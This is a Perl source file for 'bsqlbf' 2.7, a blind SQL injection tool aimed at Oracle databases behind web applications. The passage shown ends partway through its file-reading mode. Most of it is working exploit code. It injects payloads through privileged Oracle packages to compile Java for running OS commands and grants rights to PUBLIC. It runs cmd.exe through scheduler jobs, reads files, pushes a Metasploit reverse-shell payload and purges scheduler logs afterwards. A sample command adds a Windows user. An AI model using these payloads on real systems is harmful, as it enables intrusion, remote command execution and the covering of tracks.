  1. #!/usr/bin/env perl
  2. # Blind SQL Injection POC. aramosf@514.es // http://www.514.es
  3. #modified by sid//sid@notsosecure.com
  4. #
  5. #
  6. # TODO:
  7. # [ ] Rip more code from others.
  8. use LWP::Simple;
  9. use LWP::UserAgent;
  10. use Getopt::Long;
  11. use IO::Handle;
  12. use strict;
  13. use threads;
  14. use threads::shared;
  15. use Time::HiRes qw( usleep);
  16. use URI;
  17.  
  18. $| = 1;
  19.  
  20.  
  21. ###############################################################################
  22. my $default_debug = 0;
  23. my $default_length = 32;
  24. my $default_method = "GET";
  25. my $default_cmd = "ping 127.0.0.1";
  26. my $default_file = "C:\\boot.ini";
  27. my $default_stype=0;
  28. my $default_time = 0;
  29. my $version = "2.7";
  30. my $default_useragent = "bsqlbf $version";
  31. my $default_sql = "(select \@\@version)";
  32. #my $cmdfile;
  33. my $LOGFILE="cmd.txt";
  34. my $line;
  35. my $ip="";
  36. my $port="";
  37. my $err_count=0;
  38. my $url_clean;
  39. ###############################################################################
  40.  
  41.  
  42. $| = 1;
  43.  
  44. my ($args, $solution);
  45. my (%vars, @varsb);
  46. my ($lastvar, $lastval);
  47. my ($scheme, $authority, $path, $query, $fragment);
  48. my ($head, $tail, $high);
  49. my $hits = 0;
  50. my $amatch = 0;
  51. my ($ua,$req);
  52. my $furl;
  53.  
  54. ###############################################################################
  55. # Define GetOpt:
  56. my ($url, $type, $database, $sql, $time, $rtime, $match, $nomatch, $uagent, $debug);
  57. my ($proxy, $proxy_user, $proxy_pass,$rproxy, $ruagent);
  58. my ($start, $length, $method, $cmd, $file, $stype, $cookie, $blind);
  59. my ($help, $get);
  60. my ($ascii, $binary);
  61.  
  62. my $options = GetOptions (
  63.   'help!'            => \$help,
  64.   'url=s'            => \$url,
  65.   'database=s'       => \$database,
  66.   'type=s'           => \$type,
  67.   'get=s'            => \$get,
  68.   'sql=s'            => \$sql,
  69.   'blind=s'          => \$blind,
  70.   'match=s'          => \$match,
  71.   'nomatch=s'          => \$nomatch,
  72.   'start=s'          => \$start,
  73.   'length=s'         => \$length,
  74.   'method=s'         => \$method,
  75.    'cmd=s'           => \$cmd,
  76.    'file=s'          => \$file,
  77.  'stype=s'       => \$stype,
  78.   'uagent=s'         => \$uagent,
  79.   'ruagent=s'        => \$ruagent,
  80.   'cookie=s'         => \$cookie,
  81.   'proxy=s'          => \$proxy,
  82.   'proxy_user=s'     => \$proxy_user,
  83.   'proxy_pass=s'     => \$proxy_pass,
  84.   'rproxy=s'         => \$rproxy,
  85.   'debug!'           => \$debug,
  86.   'binary!'           =>\$binary,
  87.   'ascii!'           => \$ascii,
  88.   'rtime=s'          => \$rtime,
  89.   'time=i'           => \$time ,
  90.     'port=s'           => \$port,
  91.   'ip=s'           => \$ip
  92.  
  93.   );
  94.  
  95. &help unless ($url);
  96. &help if $help eq 1;
  97.  
  98. #########################################################################
  99. # Default Options.
  100. $uagent         ||= $default_useragent;
  101. $debug          ||= $default_debug;
  102. $length         ||= $default_length;
  103. $solution       ||= $start;
  104. $method         ||= $default_method;
  105. $cmd         ||= $default_cmd;
  106. $file         ||= $default_file;
  107. $stype        ||= $default_stype;
  108. $sql            ||= $default_sql;
  109. $time           ||= $default_time;
  110.  
  111. ######################################################################
  112.  
  113. #function to make GET, POST requests from the url
  114.  
  115. #my $usage = "$0 method url cookies proxy\n";
  116.  
  117. #print $method;
  118. my $method_gp ;
  119. my $url_gp ;
  120. my $cookies_gp;
  121. my $proxy_gp ;
  122.  
  123. # get_from_post("http://host/script.pl?a=b&c=d", "cook1=2; foo=bar", "http://prox:8080")
  124. #print get_or_post($method, $url, $cookies, $proxy);
  125.  
  126. sub get_or_post {
  127.         my ($method_gp, $url_gp, $cookies_gp, $proxy_gp) = @_;
  128.         my $uri = URI->new($url_gp);
  129.         print Dumper $uri->query;
  130.  
  131.         my $req;
  132.         if (($method_gp eq "GET")||($method_gp eq "get")) {
  133.                 $req = HTTP::Request->new(GET => $uri->scheme . "://" . $uri->host . ":" . $uri->port . $uri->path . "?" . $uri->query);
  134.                     }
  135.  
  136.                     elsif (($method_gp eq "POST")||($method_gp eq "post")) {
  137. $req = HTTP::Request->new(POST=> $uri->scheme . "://" . $uri->host . ":" . $uri->port . $uri->path);
  138. $req->content($uri->query);
  139.         }
  140.         else {
  141.                 die "ERROR: unknown method: $method\n";
  142.         }
  143.  
  144.         my $ua = LWP::UserAgent->new;
  145.         # $ua->env_proxy; # allow usage of env var http_proxy=http://host:8080
  146.         $ua->proxy(['http', 'https'], $proxy_gp) if defined($proxy_gp);
  147.         $ua->default_header('Cookie' => $cookies_gp) if defined($cookies_gp);
  148.         $ua->default_header('Content-Type' => 'application/x-www-form-urlencoded');
  149.         my $res = $ua->request($req);
  150.         return $res->as_string;
  151. }
  152.  
  153.  
  154. ##########################################################################
  155. &createlwp();
  156. &parseurl();
  157. my $end=0;
  158. if ( ! defined($blind)) {
  159.         $lastvar = $varsb[$#varsb];
  160.         $lastval = $vars{$lastvar};
  161. } else {
  162.         $lastvar = $blind;
  163.         $lastval = $vars{$blind};
  164. }
  165.  
  166. if (! defined($type)) {
  167.     $type=0;
  168. }
  169.  
  170. if ($type==3) {
  171.     $database=3;
  172. }
  173. if ($type==4) {
  174.     $database=3;
  175. }
  176. if (! defined($database)) {
  177.        
  178. print "\nWARNING: You did not specify any database, I am assuming you are after A Microsoft Product\n";
  179. $database=0;
  180. }
  181.  
  182. if (defined($cookie)) { &cookie() }
  183. if (!$match && !$nomatch){
  184. #print "wtf";
  185.     print "\nTrying to find a match string...\n" if $debug == 1;
  186.     $amatch = "1";
  187.     $match = fmatch("$url"," AND 1=");
  188.     if ($match eq "no vulnerable")
  189.         {
  190.         print "\nNo vuln: 2nd..\n" if $debug ==1;
  191.         $match = fmatch("$url"," AND 1='");
  192.         #$head = "\"";
  193.         #$tail = " AND 1=\"1";
  194.     };
  195.     if ($match eq "no vulnerable") {
  196.         print "Not vulnerable \n\n If you know its vulnerable supply the '-match' string\n";
  197.         exit 0;
  198.     }
  199. }
  200. &banner();
  201. &httpintro();
  202.  
  203.  
  204.  
  205.  
  206. ############################ Type 6###########################################
  207.     if($type==6)
  208.     {
  209.        
  210.        
  211.         print "--------------------------------\n";
  212.         print "--------------------------------\n";
  213.         print "Oracle O.S command execution\n";
  214.         print "\nNOTE: Please provide the vulnerable parameter as the last parameter\n";
  215.         print "\nThis will only work if your injection allows execution of SQL as SYS user\n";
  216.         print "\nFor vulnerable versions check: http://www.securityfocus.com/bid/35685\n\n";
  217.         print "\n\n\n--------------------------------\n\n\n";
  218.         print "String to Match: ".$match."\n";
  219.         $stype=0;
  220.        
  221.         #-----ora_cmd.pl--starts here
  222. ################################## S Type: 0########################################
  223.         if ($stype==0) {
  224.        
  225.         print "You asked me to execute \"".$cmd."\" on remote box with stype:".$stype."\n";
  226.         print "--------------------------------\n\n\n";
  227.  
  228. my $url_1 = $url." and ";
  229. my $javalib="(select SYS.DBMS_REPCAT_RPC.VALIDATE_REMOTE_RC(USER,'VALIDATE_GRP_OBJECTS_LOCAL(:canon_gname);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''create or replace and compile java source named \"LinxUtil\" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(new InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str=\"\";while ((stemp = myReader.readLine()) != null) str %2b=stemp%2b\"\\n\";myReader.close();return str;} catch (Exception e){return e.toString();}}public static String readFile(String filename){try{BufferedReader myReader= new BufferedReader(new FileReader(filename)); String stemp,str=\"\";while ((stemp = myReader.readLine()) != null) str %2b=stemp%2b\"\\n\";myReader.close();return str;} catch (Exception e){return e.toString();}}}'''';END;'';END;--','CCCCC') from dual) =0--";
  230.  
  231. my $javaperm="(select SYS.DBMS_REPCAT_RPC.VALIDATE_REMOTE_RC(USER,'VALIDATE_GRP_OBJECTS_LOCAL(:canon_gname);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''begin dbms_java.grant_permission( ''''''''PUBLIC'''''''', ''''''''SYS:java.io.FilePermission'''''''', ''''''''<>'''''''', ''''''''execute'''''''' );end;'''';END;'';END;--','CCCCC') from dual) =0--";
  232.  
  233. my $cmd_exec_func="(select SYS.DBMS_REPCAT_RPC.VALIDATE_REMOTE_RC(USER,'VALIDATE_GRP_OBJECTS_LOCAL(:canon_gname);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''create or replace function LinxRunCMD(p_cmd in varchar2) return varchar2 as language java name ''''''''LinxUtil.runCMD(java.lang.String) return String''''''''; '''';END;'';END;--','CCCCC') from dual)=0--";
  234.  
  235. my $priv_check="(select SYS.DBMS_REPCAT_RPC.VALIDATE_REMOTE_RC(USER,'VALIDATE_GRP_OBJECTS_LOCAL(:canon_gname);EXECUTE IMMEDIATE ''select user from dual'';END;--','CCCCC') from dual)=0--";
  236. my $cmd_exec_func_priv="(select SYS.DBMS_REPCAT_RPC.VALIDATE_REMOTE_RC(USER,'VALIDATE_GRP_OBJECTS_LOCAL(:canon_gname);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on LinxRunCMD to public'''';END;'';END;--','CCCCC') from dual) =0--";
  237.  
  238.  
  239. my $cmd_exec_func_unpriv="(select SYS.DBMS_REPCAT_RPC.VALIDATE_REMOTE_RC(USER,'VALIDATE_GRP_OBJECTS_LOCAL(:canon_gname);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE '''' drop function LinxRunCMD '''';END;'';END;--','CCCCC') from dual)=0--";
  240.  
  241. my $cmd_1=$cmd;
  242. my $cmd_exec="(select sys.LinxRunCMD('cmd.exe /c". $cmd_1. "') from dual) is null--";
  243.  
  244. ####checking if user has privileges to vulnerable function
  245.  
  246. print "Checking if we have privileges to execute function SYS.DBMS_REPCAT_RPC.VALIDATE_REMOTE_RC()...\n";
  247. #print "--------------------------------\n";
  248. my $url=$url_1.$priv_check;
  249. #print $method;
  250. #print $url;
  251. my $content = get_or_post($method,$url,$cookie,$proxy);
  252. die "Couldn't get $url" unless defined $content;
  253.  
  254.  
  255.   if(! ($content =~ m/($match)/i)) {
  256.     print "-----------------------------------------------\n";
  257.     print "ERROR: you don't seem to have the privileges or database is not vulnerable \n";
  258.     print "-----------------------------------------------\n";
  259.   } else {
  260.     print "\n\n\n--------------------------------\n\n\n";
  261.     print "Sit back....Let's exploit this...\n";
  262.     print "--------------------------------\n";
  263.    
  264. # print $content;
  265. }
  266.  
  267.  
  268. #####--------------------#####
  269.  
  270. print "Step 1. Creating Java Library...\n";
  271. #print "--------------------------------\n";
  272. my $url=$url_1.$javalib;
  273. #print $method;
  274. #print $url;
  275. my $content = get_or_post($method,$url,$cookie,$proxy);
  276. die "Couldn't get $url" unless defined $content;
  277.  
  278.  
  279.   if(! ($content =~ m/($match)/i)) {
  280.     print "-----------------------------------------------\n";
  281.     print "ERROR at STAGE 1 occured !!!...did you provide me the URL in the format, i want?? \n";
  282.     print "-----------------------------------------------\n";
  283.   } else {
  284.     print "NO errors encountered.....proceeding to step..2\n";
  285.     print "--------------------------------\n";
  286.    
  287. # print $content;
  288. }
  289.  
  290. #-----------------------
  291. print "Step 2. granting java execute privileges...\n";
  292. my $url=$url_1.$javaperm;
  293. my $content = get_or_post($method,$url,$cookie,$proxy);
  294. die "Couldn't get $url" unless defined $content;
  295.  
  296.  
  297.   if(! ($content =~ m/($match)/i)) {
  298.     print "-----------------------------------------------\n";
  299.     print "ERROR at STAGE 2 occured !!!...something was not right.. \n";
  300.     print "-----------------------------------------------\n";
  301.     print "I will proceed, however, there is a possibility that the attack will fail\n";
  302.   } else {
  303.     print "NO errors encountered.....proceeding to step..3\n";
  304.     print "--------------------------------\n";
  305.    
  306. # print $content;
  307. }
  308.  
  309. #-----------------------
  310. print "Step 3. creating funtion for command execution...\n";
  311. my $url=$url_1.$cmd_exec_func;
  312. my $content = get_or_post($method,$url,$cookie,$proxy);
  313. die "Couldn't get $url" unless defined $content;
  314.  
  315.  
  316.   if(! ($content =~ m/($match)/i)) {
  317.     print "-----------------------------------------------\n";
  318.     print "ERROR at STAGE 3 occured !!!...something was not right.. \n";
  319.     print "-----------------------------------------------\n";
  320.     print "I will proceed, however, there is a possibility that the attack will fail\n";
  321.   } else {
  322.     print "NO errors encountered.....proceeding to step..4\n";
  323.     print "--------------------------------\n";
  324.    
  325. # print $content;
  326. }
  327.  
  328. #-----------------------
  329. print "Step 4. making function executable by all users...\n";
  330. my $url=$url_1.$cmd_exec_func_priv;
  331. my $content = get_or_post($method,$url,$cookie,$proxy);
  332. die "Couldn't get $url" unless defined $content;
  333.  
  334.  
  335.   if(! ($content =~ m/($match)/i)) {
  336.     print "-----------------------------------------------\n";
  337.     print "ERROR at STAGE 4 occured !!!...something was not right.. \n";
  338.     print "-----------------------------------------------\n";
  339.     print "I will proceed, however, there is a possibility that the attack will fail\n";
  340.   } else {
  341.     print "NO errors encountered.....proceeding to step..5\n";
  342.     print "--------------------------------\n";
  343.    
  344. # print $content;
  345. }
  346.  
  347. #-----------------------
  348. print "Step 5. RIGHT!!!, by now we should have a function sys.LinxRunCMD through which we can execute commands...\n";
  349. print "--------------------------------\n";
  350. print "You should be able to execute this function as:\nselect sys.LinxRunCMD('cmd.exe /c net user notsosecure n0ts3cur3 /add') from dual\n";
  351. print "I will execute the command you told me to execute... you won't be able to see the output though :( \n";
  352. my $url=$url_1.$cmd_exec;
  353. my $content = get_or_post($method,$url,$cookie,$proxy);
  354. die "Couldn't get $url" unless defined $content;
  355.  
  356.  
  357.   if(! ($content =~ m/($match)/i)) {
  358.     print "-----------------------------------------------\n";
  359.     print "ERROR at STAGE 5 occured !!!...something was not right.. \n";
  360.     print "-----------------------------------------------\n";
  361.     print "...You need to investigate buddy....\n";
  362.   } else {
  363.     print "-----------------------------------------------\n";
  364.     print "SUCCESS: Your command executed on the box....:)\n";
  365.     print "-----------------------------------------------\n";
  366.  
  367.   }
  368. #-----------------------
  369. print "Step 6. Droping function sys.LinxRunCMD...\n";
  370. my $url=$url_1.$cmd_exec_func_unpriv;
  371. my $content = get_or_post($method,$url,$cookie,$proxy);
  372. die "Couldn't get $url" unless defined $content;
  373.  
  374.   if(! ($content =~ m/($match)/i)) {
  375.     print "-----------------------------------------------\n";
  376.     print "ERROR at STAGE 6 occured !!!...something was not right.. \n";
  377.     print "-----------------------------------------------\n";
  378.     print "!!!!WARNING:I have not been able to drop the function..!!!!!!\n";
  379.     exit 0;
  380.   } else {
  381.     print "Function dropped..\n";
  382.     exit 0;
  383. }
  384.     }
  385.  
  386. }
  387.  
  388. ####################### Type 6 stops here #########################################
  389.  
  390. ########################Type 7 Starts here##########################################
  391.  
  392.     if($type==7)
  393.     {
  394.        
  395.        
  396.         print "\n--------------------------------\n";
  397.         #print "--------------------------------\n";
  398.         print "Oracle O.S command execution with SYS.KUPP\$PROC.CREATE_MASTER_PROCESS()... \n";
  399.         print "NOTE: Please provide the vulnerable parameter as the last parameter\n";
  400.         print "This will only work if your injection allows execution of SQL as DBA\n";
  401. #       print "\nFor vulnerable versions check: http://www.securityfocus.com/bid/35685\n\n";
  402.         #print "\n\n\n--------------------------------\n\n\n";
  403.         print "String to Match: ".$match."\n";
  404. #       $stype=0;
  405.        
  406.         #-----ora_cmd.pl--starts here
  407. ################################## S Type: 0########################################
  408. #       if ($stype==0) {
  409.        
  410.         print "You asked me to execute \"".$cmd."\" on remote database host\n";
  411.         print "--------------------------------\n";
  412.  
  413. my $url_1 = $url;
  414. my $create_prog=" and (select SYS.KUPP\$PROC.CREATE_MASTER_PROCESS('DBMS_SCHEDULER.create_program(''notsosecurex'',''EXECUTABLE'',''c:\\WINDOWS\\system32\\cmd.exe /c ".$cmd." '',0,TRUE);')from dual) is not null --";
  415. my $priv_check=" and (select SYS.KUPP\$PROC.CREATE_MASTER_PROCESS('null') from dual) is not null --";
  416. my $create_job="  and (select SYS.KUPP\$PROC.CREATE_MASTER_PROCESS('DBMS_SCHEDULER.create_job(job_name=>''notsosecurexx'',program_name=>''notsosecurex'',start_date=>NULL,repeat_interval=>NULL,end_date=>NULL,enabled=>TRUE,auto_drop=>TRUE);')from dual) is not null-- ";
  417. my $remove_job=" and (select SYS.KUPP\$PROC.CREATE_MASTER_PROCESS('DBMS_SCHEDULER.DROP_PROGRAM(''notsosecurex'');')FROM DUAL) is not null --";
  418. #my $cmd_exec_func="";
  419.  
  420.  
  421. #my $cmd_1=$cmd;
  422. #my $cmd_exec="(select sys.LinxRunCMD('cmd.exe /c". $cmd_1. "') from dual) is null--";
  423.  
  424. ####checking if user has privileges to vulnerable function
  425.  
  426. print "Checking if we have privileges to execute function SYS.KUPP\$PROC.CREATE_MASTER_PROCESS()...\n";
  427. #print "--------------------------------\n";
  428. my $url=$url_1.$line;
  429. #print $method;
  430. #print $url;
  431. my $content = get_or_post($method,$url,$cookie,$proxy);
  432. die "Couldn't get $url" unless defined $content;
  433.  
  434.  
  435.   if(! ($content =~ m/($match)/i)) {
  436.     print "-----------------------------------------------\n";
  437.     print "ERROR: you don't seem to have the privileges or database is not vulnerable \n";
  438.     print "-----------------------------------------------\n";
  439.   } else {
  440. #   print "\n\n\n--------------------------------\n\n\n";
  441.     print "Sit back.. we have the right Permissions :)\nLet's exploit this...\n";
  442.     print "--------------------------------\n";
  443.    
  444. #############################reverse shell code goes here###################
  445. ##if $cmd="shell"
  446.  
  447. if($cmd eq "revshell")
  448. {
  449. #if (($ip eq "")|($port eq ""))
  450. #{ print "ERROR: IP or port not supplied for reverse shell";
  451. #exit 0;
  452. #}
  453.  
  454. print "Reading file cmd.txt \n Uploading metasploit's payload\n";
  455. open LOGFILE, "cmd.txt" or die("Could not open cmd file. Did you run generator.exe to generate cmd.txt\n");
  456. foreach $line (<LOGFILE>) {
  457. #print "line is: ".$line;  
  458. my $url=$url_1.$line;
  459. #print $method;
  460. #print $url;
  461. my $content = get_or_post($method,$url,$cookie,$proxy);
  462. die "Couldn't get $url" unless defined $content;
  463.  
  464.  
  465.   if(! ($content =~ m/($match)/i)) {
  466.     #print "-----------------------------------------------\n";
  467.     print "!!";
  468.     $err_count=$err_count+1;
  469.     #print "-----------------------------------------------\n";
  470.   } else {
  471. #   print "\n\n\n--------------------------------\n\n\n";
  472.     print "..";
  473. }
  474. }
  475.  
  476. if ($err_count>0)
  477. { print "\n".$err_count." Error Occured, it may not work\n";
  478.  
  479. }
  480. else{
  481. print "\nYipee! Should have a session now!\nRemember to clean up the server after exiting the metasploit session, -cmd=cleanup\n";
  482. exit 0;
  483. }
  484. }
  485. ##############################reverse shell code ends here###################
  486.    
  487. ##########################clean up code#####################
  488.  
  489.  
  490. if($cmd eq "cleanup")
  491. {
  492.  
  493. $err_count=0;
  494.  
  495. $url_clean=" and (SELECT SYS.KUPP\$PROC.CREATE_MASTER_PROCESS('BEGIN dbms_lock.sleep(1);DBMS_SCHEDULER.drop_program(PROGRAM_NAME => ''BSQLBFPROG'');DBMS_SCHEDULER.PURGE_LOG;END;') from dual) is not null--";  
  496. my $url=$url_1.$url_clean;
  497.  
  498.  
  499. my $content = get_or_post($method,$url,$cookie,$proxy);
  500. die "Couldn't get $url" unless defined $content;
  501.  
  502.  
  503.   if(! ($content =~ m/($match)/i)) {
  504.     #print "-----------------------------------------------\n";
  505.     print "!!";
  506.     $err_count=$err_count+1;
  507.     #print "-----------------------------------------------\n";
  508.   } else {
  509. #   print "\n\n\n--------------------------------\n\n\n";
  510.     print "..";
  511. }
  512.  
  513.  
  514. if ($err_count>0)
  515. { print "\n".$err_count." Error Occured!";
  516.  
  517. }
  518. else{
  519. print "System cleaned";
  520. exit 0;
  521. }
  522. }
  523.  
  524.  
  525.  
  526. ####################clean up code ends##########################   
  527.    
  528.    
  529.    
  530. # print $content;
  531.  
  532. print "Step1. Creating Program with DBMS_SCHEDULER\n";
  533. my $url=$url_1.$create_prog;
  534. #print $method;
  535. #print $url;
  536. my $content = get_or_post($method,$url,$cookie,$proxy);
  537. die "Couldn't get $url" unless defined $content;
  538.  
  539.  
  540.   if(! ($content =~ m/($match)/i)) {
  541.     print "-----------------------------------------------\n";
  542.     print "ERROR: Something is not quite right, i will still continue to 2nd step \n";
  543.     print "-----------------------------------------------\n";
  544.   } else {
  545.     print "..Program Created..\n";
  546.     print "--------------------------------\n";
  547.   }
  548.  
  549.  
  550. print "Step2. Creating JOB with DBMS_SCHEDULER\n";
  551. my $url=$url_1.$create_job;
  552. #print $method;
  553. #print $url;
  554. my $content = get_or_post($method,$url,$cookie,$proxy);
  555. die "Couldn't get $url" unless defined $content;
  556.  
  557.  
  558.   if(! ($content =~ m/($match)/i)) {
  559.     print "-----------------------------------------------\n";
  560.     print "ERROR: Unable to create job, i will still continue to 3rd step \n";
  561.     print "-----------------------------------------------\n";
  562.   } else {
  563.     #print "\n\n\n--------------------------------\n\n\n";
  564.     print "..Job Created Created.\n. your command should have been executed by now \n";
  565.     print "Sleeping for 10 seconds \n";
  566.     print "\n--------------------------------\n";
  567.     sleep(10);
  568.   }
  569.  
  570. print "Step3. Removing JOB (Clean-up)\n";
  571. my $url=$url_1.$remove_job;
  572. #print $method;
  573. #print $url;
  574. my $content = get_or_post($method,$url,$cookie,$proxy);
  575. die "Couldn't get $url" unless defined $content;
  576.  
  577.  
  578.   if(! ($content =~ m/($match)/i)) {
  579.     print "-----------------------------------------------\n";
  580.     print "ERROR: Unable to Remove job\n";
  581.     print "-----------------------------------------------\n";
  582.   } else {
  583. #   print "\n\n\n--------------------------------\n\n\n";
  584.     print "..Job Removed..\n";
  585.     print "--------------------------------\n";
  586. die "Enjoy!";
  587. #   sleep(10);
  588.   }
  589.  
  590.  
  591.   }}
  592.  
  593.  
  594.  
  595.  
  596.  
  597.  
  598.  
  599. #####--------type 7 stops here------------#####
  600.  
  601.  
  602.  
  603.  
  604.  
  605. ######--type 8 starts here-----------------#######
  606.  
  607.     if($type==8)
  608.     {
  609.        
  610.        
  611.         print "\n--------------------------------\n";
  612.         #print "--------------------------------\n";
  613.         print "Oracle O.S command execution with DBMS_JAVA_TEST.FUNCALL... \n";
  614.         print "NOTE: Please provide the vulnerable parameter as the last parameter\n";
  615.         print "This will only work if the user has JAVA IO privileges\n";
  616. #       print "\nFor vulnerable versions check: http://www.securityfocus.com/bid/35685\n\n";
  617.         #print "\n\n\n--------------------------------\n\n\n";
  618.         print "String to Match: ".$match."\n";
  619. #       $stype=0;
  620.        
  621.        
  622.         print "You asked me to execute \"".$cmd."\" on remote database host\n";
  623.         print "--------------------------------\n";
  624.  
  625. my $url_1 = $url;
  626. my $exec_java_cmd=" and (Select DBMS_JAVA_TEST.FUNCALL('oracle/aurora/util/Wrapper','main','c:\\\\windows\\\\system32\\\\cmd.exe','/c',' ". $cmd."') FROM DUAL) is null --";
  627. my $priv_check="  and (select count(*) from user_java_policy where GRANTEE_NAME=user and type_name='java.io.FilePermission' and action ='execute') > 0 --";
  628.  
  629. print "Checking if we have Java IO Permissions...\n";
  630. #print "--------------------------------\n";
  631. my $url=$url_1.$priv_check;
  632. my $content = get_or_post($method,$url,$cookie,$proxy);
  633. die "Couldn't get $url" unless defined $content;
  634.  
  635.  
  636.   if(! ($content =~ m/($match)/i)) {
  637.     print "-----------------------------------------------\n";
  638.     print "ERROR: you don't seem to have the privileges or database is not vulnerable \n";
  639.     die "ending..";
  640.     print "-----------------------------------------------\n";
  641.   } else {
  642. #   print "\n\n\n--------------------------------\n\n\n";
  643.     print "Sit back.. we have the right Permissions :)\nLet's exploit this...\n";
  644.     print "--------------------------------\n";
  645.  
  646. ################revshell code###################
  647. if($cmd eq "revshell")
  648. {
  649. #if (($ip eq "")|($port eq ""))
  650. #{ print "ERROR: IP or port not supplied for reverse shell";
  651. #exit 0;
  652. #}
  653.  
  654. print "Reading file cmd.txt \n Uploading metasploit's payload\n";
  655. open LOGFILE, "cmd.txt" or die("Could not open cmd file. Did you run generator.exe to generate cmd.txt\n");
  656. foreach $line (<LOGFILE>) {
  657. #print "line is: ".$line;  
  658. my $url=$url_1.$line;
  659. #print $method;
  660. #print $url;
  661. my $content = get_or_post($method,$url,$cookie,$proxy);
  662. die "Couldn't get $url" unless defined $content;
  663.  
  664.  
  665.   if(! ($content =~ m/($match)/i)) {
  666.     #print "-----------------------------------------------\n";
  667.     print "!!";
  668.     $err_count=$err_count+1;
  669.     #print "-----------------------------------------------\n";
  670.   } else {
  671. #   print "\n\n\n--------------------------------\n\n\n";
  672.     print "..";
  673. }
  674. }
  675.  
  676. if ($err_count>1)
  677. { print "\n".$err_count." Error Occured, it may not work\n";
  678. exit 0;
  679. }
  680. else{
  681. print "\nYipee! Should have a session now!\n";
  682. exit 0;
  683. }
  684. }
  685.  
  686. ####################revshell code ends#################
  687.  
  688.     my $url=$url_1.$exec_java_cmd;
  689.     my $content = get_or_post($method,$url,$cookie,$proxy);
  690.     die "Couldn't get $url" unless defined $content;
  691.    
  692.     if(! ($content =~ m/($match)/i)) {
  693.         die "Error Encountered \n";
  694.        
  695.     }
  696.     else{
  697.     die "Command executed Successfully \n";
  698.     }
  699.  
  700.  
  701.   }
  702.  
  703.  
  704.     }
  705. #######-type 8 stops here ------------------########
  706.  
  707.  
  708.  
  709.  
  710.  
  711.  
  712.  
  713. ####################### Type 5 starts here #########################################
  714.  
  715. if ($type==5)
  716. {
  717. #print $file;
  718.  
  719. $end =1;
  720. $type=0;
  721. $database=3;
  722. $sql="select sys.LinxReadfile('".$file."') from dual";
  723. print "\n\nType 5: Creates a function to read files..\n";
  724. print "--------------------------------\n\n\n";
  725.  
  726. my $url_1 = $url." and ";
  727. my $javalib="(select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT\".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''create or replace and compile java source named \"LinxUtil\" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(new InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str=\"\";while ((stemp = myReader.readLine()) != null) str %2b=stemp%2b\"\\n\";myReader.close();return str;} catch (Exception e){return e.toString();}}public static String readFile(String filename){try{BufferedReader myReader= new BufferedReader(new FileReader(filename)); String stemp,str=\"\";while ((stemp = myReader.readLine()) != null) str %2b=stemp%2b\"\\n\";myReader.close();return str;} catch (Exception e){return e.toString();}}}'''';END;'';END;--','SYS',0,'1',0) from dual) is null--";
  728.  
  729. my $javaperm="(select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT\".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''begin dbms_java.grant_permission( ''''''''PUBLIC'''''''', ''''''''SYS:java.io.FilePermission'''''''', ''''''''<>'''''''', ''''''''execute'''''''' );end;'''';END;'';END;--','SYS',0,'1',0) from dual) is null--";
  730.  
  731. my $cmd_exec_func="(select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT\".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''create or replace function LinxReadFile(filename in varchar2) return varchar2 as language java name ''''''''LinxUtil.readFile(java.lang.String) return String''''''''; '''';END;'';END;--','SYS',0,'1',0) from dual) is null--";
  732.  
  733. my $cmd_exec_func_priv="(select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT\".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on LinxReadFile to public'''';END;'';END;--','SYS',0,'1',0) from dual) is null--";
  734. my $cmd_exec_func_unpriv="(select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT\".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE '''' drop function LinxRunCMD '''';END;'';END;--','SYS',0,'1',0) from dual)is null--";
  735.  
  736. #my $cmd_1=$cmd;
  737. #my $cmd_exec="(select sys.LinxRunCMD('cmd.exe /c". $cmd_1. "') from dual) is null--";
  738.  
  739. print "Step 1. Creating Java Library...\n";
  740. #print "--------------------------------\n";
  741. my $url=$url_1.$javalib;
  742. #print $method;
  743. #print $url;
  744. my $content = get_or_post($method,$url,$cookie,$proxy);
  745. die "Couldn't get $url" unless defined $content;
  746.  
  747.  
  748.   if(! ($content =~ m/($match)/i)) {
  749.     print "-----------------------------------------------\n";
  750.     print "ERROR at STAGE 1 occured !!!...did you provide me the URL in the format, i want?? \n";
  751.     print "-----------------------------------------------\n";
  752.   } else {
  753.     print "NO errors encountered.....proceeding to step..2\n";
  754.     print "--------------------------------\n";
  755.    
  756. # print $content;
  757. }
  758.  
  759. #-----------------------
  760. print "Step 2. granting java execute privileges...\n";
  761. my $url=$url_1.$javaperm;
  762. my $content = get_or_post($method,$url,$cookie,$proxy);
